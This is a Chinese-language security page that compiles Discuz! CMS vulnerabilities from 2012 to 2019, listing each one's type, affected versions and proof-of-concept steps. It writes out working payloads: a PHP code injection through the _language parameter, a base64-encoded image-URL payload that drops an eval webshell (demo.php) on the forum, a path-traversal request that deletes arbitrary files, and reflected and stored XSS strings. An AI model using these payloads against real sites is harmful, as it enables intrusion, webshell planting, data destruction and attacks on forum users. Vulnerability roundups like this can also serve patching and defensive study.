应用安全 - CMS - Discuz漏洞汇总


Discuz ML! V3.X 代码注入

Date 2019 类型
代码注入导致RCE

影响范围 Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org

poc
_language=sc'.phpinfo().';

 

SSV-90861

Date:
2012

类型:
敏感信息泄露

影响范围:
DZ x2.5 

POC:
http://www.xx.xx/uc_server/control/admin/db.php http://www.xx.xx/source/plugin/myrepeats/table/table_myrepeats.php http://www.xx.xx/install/include/install_lang.php

 

Discuz! X2.5 远程代码执行

Date: 2012 类型:
RCE

前置条件:1).注册任意账户
(2).登陆用户,发表blog日志(注意是日志)
(3).添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
(4).访问日志,论坛根目录下生成demo.php,一句发密码c

影响范围:
v2.5

 

Discuz!X2/2.5弱口令破解漏洞

Date: 2013 类型:
登录界面暴力破解

影响范围:
Discuz!X2/2.5

 

ssvid-93588

Date: 2014 类型:
任意文件删除

前置条件:
(1)登陆DZ前台
(2)请求:
home.php?mod=spacecp&ac=profile&op=base
POST birthprovince=../../../test.txt&profilesubmit=1&formhash=b644603b
修改成功之后出生地就会变为../../../test.txt

(3)构造请求向home.php?mod=spacecp&ac=profile&op=base上传文件(普通图片即可)

请求后文件被删除


影响范围:
version<=3.4

 

SSV-96608

Date: 2014.10 类型:
前台任意文件删除

影响范围:

 

SSV-89024

Date: 2015.1 类型:
Discuz X2.5 /source/class/class_image.php 命令执行漏洞

影响范围:
Discuz X2.5 

 

Discuz! X系列远程代码执行漏洞

Date: 2015.8 类型:
RCE + XML反序列化

前置条件:
访问:/api/uc.php
影响范围:

 

SSV-91183

Date: 2016.3 类型:
SSRF
 影响范围:
Discuz! X2 X3

POC:
http://www.internetblog.cn/archives/6068.html?mip

 

CVE-2018-14729

Date: 2018.8 类型:
远程代码执行
 前置条件:
登录后台
 影响范围:
Discuz! 1.5-2.5

 

Discuz
Discuz!X ≤3.4 任意文件删除漏洞分析

Discuz!7.2/X1 第三方插件SQL注入及持久型XSS漏洞
SQL注入及跨站脚本漏洞。
moodwall.inc.php
发表心情处直接插入html代码
code 区域
"><script>alert(/xss/)</script>


Discuz! X1某页面存在XSS漏洞
简要描述:
页面对取到的参数没有过滤,直接echo到了html里
详细说明:
api/db/dbbak.php页面,对$apptype缺少必要的过滤,调用api_msg()函数时直接将$apptype echo到了html中。
漏洞证明:
http://**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM